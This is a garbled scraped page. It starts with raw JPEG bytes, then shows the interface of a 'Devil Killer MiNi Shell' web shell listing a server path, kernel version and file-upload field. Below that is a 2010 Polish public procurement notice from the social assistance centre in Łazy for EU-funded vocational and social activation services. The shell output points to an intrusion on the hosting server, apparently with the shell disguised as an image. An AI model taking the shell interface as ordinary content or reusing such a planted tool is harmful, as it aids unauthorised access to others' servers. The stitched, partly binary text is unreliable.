JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100521/139974-N-2010.html

<p class="kh_header"><b>Łazy: Obsługa projektu systemowego Nowe umiejętności kapitałem na przyszłość - promocja aktywnej integracji społecznej i zawodowej w Gminie Łazy realizowanego przez OPS w Łazach w ramach POKL7.1.1. na rok 2010</b><br>
<b>Numer ogłoszenia: 139974 - 2010; data zamieszczenia: 21.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Pocztowa 14, 42-450 Łazy, woj. śląskie, tel. 032 6729571, faks 032 6729571.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opslazy.jur.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa projektu systemowego Nowe umiejętności kapitałem na przyszłość - promocja aktywnej integracji społecznej i zawodowej w Gminie Łazy realizowanego przez OPS w Łazach w ramach POKL7.1.1. na rok 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia : Obsługa projektu systemowego Nowe umiejętności kapitałem na przyszłość - promocja aktywnej integracji społecznej i zawodowej w Gminie Łazy realizowanego przez OPS w Łazach w ramach POKL 7.1.1.na rok 2010.
Usługa polegająca na zorganizowaniu dla uczestników projektu usług aktywizacji zawodowej, edukacyjnej i społecznej poprzez następujące narzędzia aktywizacyjne:
I etap:
1.doradztwo zawodowe dla uczestników projektu,
2.trening kompetencji,
3.zajęcia grupy wsparcia,
4.warsztaty stacjonarne podnoszące kompetencje życiowe i umiejętności społeczno-zawodowe,
5.poradnictwo zawodowe i psychologiczne.
II etap:
6.szkolenia i kursy zawodowe zapewniające nabycie wiedzy i umiejętności teoretycznych i praktycznych,
7.spotkanie podsumowujące osiągnięte rezultaty projektu.
Realizacja celów projektu zostanie osiągnięta dzięki oddziaływaniu na uczestników w ramach kontraktów socjalnych, poprzez zastosowanie narzędzi aktywizacji zawodowej, edukacyjnej czy społecznej. Dla każdego uczestnika przewiduje się realizację co najmniej 3 narzędzi.
Dodatkowo realizacja zamówienia ma przyczynić się do osiągnięcia zakładanych wskaźników projektu w 2010r.:
-31 os. skorzysta z indywidualnego i grupowego poradnictwa doradcy zawodowego,
-31 os. uzyska zaświadczenie o ukończeniu treningów kompetencji i umiejętności społecznych, 
-31 os. uzyska zaświadczenie o ukończeniu szkoleń i kursów zawodowych,
-21 os. uzyska zaświadczenie o uczestniczeniu w działalności grupy wsparcia,
-31 os. uzyska zaświadczenie o ukończeniu stacjonarnych warsztatów podnoszących kompetencje życiowe i umiejętności społeczno-zawodowe,
-31 os. skorzysta z poradnictwa specjalistycznego psychologa, doradcy zawodowego lub prawnika, udzielających informacji o prawach i uprawnieniach, służące przywróceniu samodzielności życiowej i powrotowi na rynek pracy.
Zamówienie obejmuje: 
I etap
1.Indywidualne doradztwo zawodowe dla 31 uczestników projektu - w wymiarze 30 godzin z terminem rozpoczęcia nie późniejszym niż 14 dni od dnia podpisania umowy z Wykonawcą.
Spotkania realizowane w ramach doradztwa prowadzone będą na miejscu w Łazach.
Zajęcia może prowadzić wyłącznie doradca zawodowy legitymujący się wykształceniem wyższym, co najmniej 3 letnim doświadczeniem pracy oraz zrealizowanymi usługami doradczymi w co najmniej 1 projekcie realizowanym w ramach EFS. Efektem końcowym doradztwa będzie opracowanie dla 31 uczestników projektu Indywidualnego Planu Działania, zawierającego m.in. krótki opis sytuacji społeczno-zawodowej, rodzinnej i zdrowotnej uczestnika, przyczyny problemów z uzyskaniem zatrudnienia, rodzaj wsparcia jakiego uczestnik potrzebuje, co chciałby zmienić i osiągnąć, cele zaproponowanych przez doradcę zawodowego działań oraz zalecenia związane z miejscem, rodzajem i warunkami podejmowanej w przyszłości pracy. Wykonawca zobowiązany jest do przesyłania Zamawiającemu list obecności uczestników zajęć w okresach tygodniowych , celem weryfikacji uczestnictwa Beneficjentów w działaniu.
Wykonawca zapewni salę do spotkań oraz catering dla uczestników i doradcy zawodowego (m.in. kawa, herbata, napoje, ciasteczka, posiłek). Wykonawca zapewni dowóz uczestników na miejsce zajęć bądź też zagwarantuje zwrot kosztów dojazdu uczestników na zajęcia.
2.Trening kompetencji i umiejętności społeczno-zawodowych - organizacja dwóch 7 - dniowych wyjazdów na terenie powiatu zawierciańskiego, 2 grupy, łącznie 31 osób - prowadzony przez psychologów i/lub pedagogów z zakresu m.in.:  identyfikacji czynników niepodejmowania aktywności zawodowej, pogłębiania świadomości swoich mocnych i słabych stron, budowanie poczucia własnej wartości, automotywacja, poszukiwanie źródeł mocy, proaktywności - jak działać skutecznie, zarządzania własnym czasem. Zajęcia może prowadzić wyłącznie psycholog i/lub pedagog legitymujący się wykształceniem wyższym, co najmniej 3 letnim doświadczeniem pracy oraz zrealizowanymi usługami doradczymi w co najmniej 1 projekcie realizowanym w ramach EFS.
Przewidywana ilość godzin - 2 grupy x  6 godzin dziennie x 7 dni , tj. 84 godz. z terminem rozpoczęcia nie późniejszym niż 60 dni od dnia podpisania umowy z Wykonawcą.
W ramach wyjazdu Wykonawca zapewnia: dojazd grupy tam i z powrotem, wyżywienie, materiały szkoleniowe, ubezpieczenie grupy.  Wykonawca zobowiązany jest do przesyłania Zamawiającemu list obecności uczestników zajęć w okresach tygodniowych, celem weryfikacji uczestnictwa Beneficjentów w działaniu. Po zakończonych zajęciach Wykonawca przedstawi indywidualne opinie dla każdego uczestnika projektu, obejmujące m.in. predyspozycje uczestnika, umiejętności współpracy w grupie, indywidualne uzdolnienia, motywacja do podjęcia pracy. Wykonawca przedstawia Zamawiającemu harmonogram realizacji zajęć treningu kompetencji.
3.Grupa wsparcia - dla 21 uczestników posiadających dzieci w wieku do 18.r.ż. (2 grupy x średnio 10-11 osób) spotkania 2h/tydz./5 miesięcy) w terminie od 01.07.2010 do  30.11.2010. Uczestnicy grup wsparcia maja zostać objęci profesjonalnym wsparciem doradczym psychologa. Na zajęciach z uczestnikami omawiane zostaną m.in. zmiany i problemy z jakimi borykają się ich rodziny, gdzie tkwi tajemnica szczęścia rodzinnego, jak pomóc dziecku szczęśliwie dorastać i jak je ochronić przed zgubnymi wpływami środowiska.
Łącznie 48 godzin zajęć dla każdej z grup.
Spotkania realizowane w ramach grupy wsparcia prowadzone będą na miejscu w Łazach.
Zajęcia powinien prowadzić psycholog z co najmniej 3 letnim stażem pracy oraz 
zrealizowanymi usługami psychologicznymi w co najmniej 1 projekcie realizowanym w ramach EFS. 
Wykonawca zapewni salę do spotkań oraz catering dla uczestników i trenera (m. in. kawa, herbata, napoje, ciasteczka). Wykonawca zapewni dowóz uczestników na miejsce zajęć bądź też zagwarantuje zwrot kosztów dojazdu uczestników na zajęcia. Wykonawca zobowiązany jest do przesyłania Zamawiającemu list obecności uczestników zajęć w okresach tygodniowych, celem weryfikacji uczestnictwa Beneficjentów w działaniu. Wykonawca przedstawia Zamawiającemu harmonogram realizacji zajęć grupy wsparcia.
4.Warsztaty stacjonarne podnoszące kompetencje życiowe i umiejętności społeczno-zawodowe (2 grupy 15-to i 16-to osobowe x 6 spotkań x 4 godz) w terminie od 01.07.2010 do  30.11.2010. 
W ramach warsztatów poradnictwo grupowe i indywidualne doradcy zawodowego lub psychologa.
Zajęcia prowadzone będą w 2 grupach, łącznie 31 osób. Każda z grup musi odbyć 6 spotkań po 4 godziny zajęć. Razem 48 godzin zajęć.
Spotkania realizowane w ramach doradztwa zawodowego prowadzone będą na miejscu w Łazach. 
Zajęcia może prowadzić wyłącznie doradca zawodowy/psycholog  legitymujący się wykształceniem wyższym, co najmniej 3 letnim doświadczeniem pracy oraz zrealizowanymi usługami doradczymi w co najmniej 1 projekcie realizowanym w ramach EFS.
Wykonawca zapewni salę do spotkań oraz catering dla uczestników i trenera (m.in. kawa, herbata, napoje, ciasteczka, posiłek). Wykonawca zapewni dowóz uczestników na miejsce zajęć bądź też zagwarantuje zwrot kosztów dojazdu uczestników na zajęcia. Wykonawca zobowiązany jest do przesyłania Zamawiającemu list obecności uczestników zajęć w okresach tygodniowych, celem weryfikacji uczestnictwa Beneficjentów w działaniu. Po zakończonych zajęciach Wykonawca przedstawi indywidualne opinie dla każdego uczestnika projektu, obejmujące m.in. predyspozycje uczestnika, umiejętności współpracy w grupie, indywidualne uzdolnienia, motywacja do podjęcia pracy.  Wykonawca przedstawia Zamawiającemu harmonogram realizacji warsztatów.
5. Specjalistyczne poradnictwo doradcy zawodowego,  psychologa lub prawnika.
Przewiduje się zrealizowanie poradnictwa dla 31 osób - w wymiarze łącznie 31 godzin w okresie od 01.10.2010r. do 30.11.2010r.
Spotkania prowadzone będą na miejscu w Łazach.
Zajęcia może prowadzić wyłącznie doradca zawodowy/psycholog/prawnik legitymujący się wykształceniem wyższym, co najmniej 3 letnim doświadczeniem pracy oraz (w przypadku doradcy zawodowego i psychologa) zrealizowanymi usługami doradczymi w co najmniej 1 projekcie realizowanym w ramach EFS.
Wykonawca zapewni salę do spotkań oraz catering dla uczestników i trenera (m.in. kawa, herbata, napoje, ciasteczka, posiłek). Wykonawca zapewni dowóz uczestników na miejsce zajęć bądź też zagwarantuje zwrot kosztów dojazdu uczestników na zajęcia. Po zrealizowanym doradztwie Zamawiający otrzyma od Wykonawcy listy obecności oraz potwierdzenia zrealizowanych usług doradczych dla uczestników.
II etap 
6.Szkolenia i kursy zawodowe dla max 31 osób,  zgodnie z potrzebami uczestników i sytuacją na rynku pracy, w celu podniesienia lub zdobycia kluczowych kompetencji o charakterze zawodowym i praktycznym (Zamawiający zastrzega sobie prawo do zmiany ilości osób korzystających ze szkoleń zawodowych) w okresie od 01.07.2010r. do  30.11.2010r. Szczegółowy wykaz szkoleń oraz ostateczna ilość osób korzystających z tej formy wsparcia, znana będzie po określeniu przez doradcę zawodowego indywidualnego planu działania dla uczestnika projektu będącego częścią kontraktu socjalnego. W przypadku udziału w szkoleniach   i kursach zawodowych mniejszej ilości uczestników niż zakładana ilość 31 osób, Zamawiający zapłaci Wykonawcy za faktycznie zrealizowane usługi. Szkolenia winny kończyć się przeprowadzeniem egzaminu oraz wydaniem zaświadczenia  o  ukończeniu  kursu  potwierdzającego  zakres  szkolenia  oraz  umiejętności/uprawnienia zdobyte w związku z ukończeniem kursu. Wydane zaświadczenie powinno obowiązkowo zawierać dodatkowe informacje: logo  PO  KL  oraz  Unii  Europejskiej  i  informacje  o  realizacji projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Wykonawca zaopatrzy uczestników w materiały szkoleniowe, które będą zawierały dodatkowe informacje: logo  PO  KL  oraz  Unii  Europejskiej  i  informacje  o  realizacji projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Dopuszcza się, aby Wykonawca realizował część szkoleń, których nie jest w stanie zrealizować sam,  przez podwykonawcę. Podwykonawcę  obowiązują również zapisy dotyczące wizualizacji.  
Wykonawca pokrywa koszty ubezpieczenia uczestników od następstw nieszczęśliwych wypadków, badań lekarskich i psychologicznych, jeżeli są wymagane w odrębnych przepisach, egzaminów zewnętrznych umożliwiających uzyskanie świadectw, dyplomów, zaświadczeń, określonych uprawnień zawodowych lub tytułów zawodowych oraz uzyskania licencji niezbędnych do wykonywania danego zawodu.
Miejsce szkoleń i kursów - wskazane przez wykonawcę, jeżeli łączny czas dojazdu z Łaz na szkolenie i z powrotem nie przekroczy 2 godzin. Szkolenia i kursy muszą być realizowane przez instytucję posiadającą wpis do rejestru instytucji szkoleniowych Wojewódzkiego Urzędu Pracy. Wykonawca przedłoży właściwe zaświadczenia z aktualnym wpisem instytucji szkoleniowej na 2010 rok. 
Wykonawca zapewni dowóz uczestników na miejsce zajęć bądź też zagwarantuje zwrot kosztów dojazdu uczestników na zajęcia. Wykonawca przedstawia Zamawiającemu harmonogram realizacji każdego kursu/szkolenia oraz program każdego szkolenia/kursu zawodowego.
Wykonawca zobowiązany jest do rejestracji instytucji szkoleniowej w internetowej bazie ofert szkoleniowych dostępnej na stronie: www.inwestycjawkadry.pl .
7. Spotkanie podsumowujące osiągnięte rezultaty projektu  dla 31 uczestników projektu oraz pracowników socjalnych, doradców zawodowych i psychologów realizujących warsztaty i doradztwo w ramach projektu w okresie do 10 grudnia 2010r.
Wykonawca zapewni dojazd grupy tam i z powrotem, salę do spotkania oraz catering dla uczestników.
Wykonawca zobowiązany jest do prowadzenia następującej ewidencji:
a) list obecności uczestników poświadczających udział w poszczególnych narzędziach projektu,
b) poświadczenie przez uczestnika wykonania usług doradczych (grupowych i indywidualnych),
świadczonych przez doradcę zawodowego, psychologa, prawnika,
c) dokumentów zaświadczających i potwierdzających ukończenie treningu, szkolenia, kursu,
d) prowadzenia dokumentacji treningów, warsztatów, szkoleń stanowiącej: dziennik zajęć, lista obecności, protokół z egzaminu, rejestr wydanych zaświadczeń , potwierdzenia wydanych materiałów szkoleniowych, potwierdzenia wydanych usług cateringowych,
e) dokumentów oceniających zrealizowanie każdego z narzędzi aktywizujących (m.in. treningu, szkolenia, kursu, grupy wsparcia) po jego ukończeniu przez uczestnika,
f) wykonawca  jest  zobowiązany  przeprowadzić  dwukrotnie  (w  połowie  czasu  trwania 
zamówienia oraz po jego zakończeniu) badanie ankietowe uczestników dotyczące 
weryfikacji  poziomu  zawartości merytorycznej  zajęć  a  także  jakości  prowadzonych  zajęć. 
Ankiety oraz ich analizę Wykonawca przekaże niezwłocznie Zamawiającemu.
g) innej dokumentacji wymaganej przez Zamawiającego, niezbędnej do realizacji zamówienia.
Wykonawca  jest  zobowiązany  do  oznaczenia  pomieszczenia,  w  którym  będzie 
realizowane  zamówienie  poprzez  wywieszenie  czytelnej  informacji  zawierającej  dwa podstawowe  logotypy:  logo  PO  KL  oraz  Unii  Europejskiej  i  informacje  o  realizacji projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.  Informacja  ta powinna być umieszczona w widocznym miejscu  i czytelna dla wszystkich osób uczestniczących w szkoleniu. 
Wykonawca  zobowiązany  jest  do  zapewnienia  w  trakcie  trwania  szkolenia  warunków pracy  zgodnych  z  przepisami  bezpieczeństwa  i  higieny  pracy  oraz  przepisami przeciwpożarowymi. 
Wykonawca  jest  zobowiązany  do  niezwłocznego informowania na piśmie lub telefonicznie  Zamawiającego o nieusprawiedliwionej nieobecności uczestnika na zajęciach, dłuższej niż 3 dni, przypadającej w kolejnych, następujących po sobie dniach zajęć, traktowanej jako przerwanie uczestnictwa w danej formie wsparcia, w terminie 3 dni od zaistnienia zdarzenia.
Wykonawca  jest  zobowiązany  do  zawiadomienia o fakcie uchylania się uczestnika od przystąpienia do sprawdzianów i egzaminów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY NIE ŻĄDA SPEŁNIENIA TEGO WARUNKU</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia powyższy warunek udziału w postępowaniu jeżeli wykaże poprzez przedstawienie stosownych referencji, że w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności Wykonawcy jest krótszy - w tym okresie zrealizował:
a)przynajmniej jedno zamówienie na rzecz instytucji publicznej w ramach EFS POKL z zakresu realizacji szkoleń i kursów zawodowych, doradztwa zawodowego oraz psychologicznego dla osób fizycznych nie posiadających zatrudnienia o wartości przynajmniej 50.000 zł</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY NIE ŻĄDA SPEŁNIENIA TEGO WARUNKU</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, przy czym:

1)Indywidualne doradztwo zawodowe: 
Wykonawca dysponuje co najmniej trzema osobami która pełnić będzie obowiązki doradcy zawodowego, legitymującymi się wykształceniem wyższym, co najmniej 3 letnim doświadczeniem pracy oraz zrealizowanymi usługami doradczymi w co najmniej 1 projekcie realizowanym w ramach EFS. 
2)Trening kompetencji i umiejętności społeczno-zawodowych: 
Wykonawca dysponuje co najmniej dwoma osobami, które pełnić będą obowiązki psychologa i/lub doradcy zawodowego, legitymującymi się wykształceniem wyższym, co najmniej 3 letnim doświadczeniem pracy oraz zrealizowanymi usługami doradczymi w co najmniej 1 projekcie realizowanym w ramach EFS. 
3)Grupa wsparcia: 
Wykonawca dysponuje co najmniej dwoma osobami, które pełnić będą obowiązki psychologa, z co najmniej 3 letnim stażem pracy oraz zrealizowanymi usługami psychologicznymi w co najmniej 1 projekcie realizowanym w ramach EFS.
4)Warsztaty stacjonarne podnoszące kompetencje życiowe i umiejętności społeczno-zawodowe: 
Wykonawca dysponuje co najmniej dwoma osobami, które pełnić będą obowiązki doradcy zawodowego/psychologa, legitymującymi się wykształceniem wyższym, co najmniej 3 letnim doświadczeniem pracy oraz zrealizowanymi usługami doradczymi w co najmniej 1 projekcie realizowanym w ramach EFS.
5)Specjalistyczne poradnictwo doradcy zawodowego, psychologa lub prawnika: 
Wykonawca dysponuje co najmniej dwoma osobami, które pełnić będą obowiązki doradcy zawodowego/psychologa/prawnika legitymujących się wykształceniem wyższym, co najmniej 3 letnim doświadczeniem pracy oraz (w przypadku doradcy zawodowego i psychologa) zrealizowanymi usługami doradczymi w co najmniej 1 projekcie realizowanym w ramach EFS. 
6)Szkolenia i kursy zawodowe : 
Szkolenia i kursy muszą być realizowane przez instytucję posiadającą wpis do rejestru instytucji szkoleniowych Wojewódzkiego Urzędu Pracy.
Szczegółowy wykaz szkoleń oraz ostateczna ilość osób korzystających z tej formy wsparcia, znana będzie po określeniu przez doradcę zawodowego indywidualnego planu działania dla uczestnika projektu będącego częścią kontraktu socjalnego Stąd Zamawiający zastrzega sobie prawo do bieżącej konsultacji w sprawie doboru odpowiedniej kadry, która będzie realizowała szkolenia zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZAMAWIAJĄCY NIE ŻĄDA SPEŁNIENIA TEGO WARUNKU</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

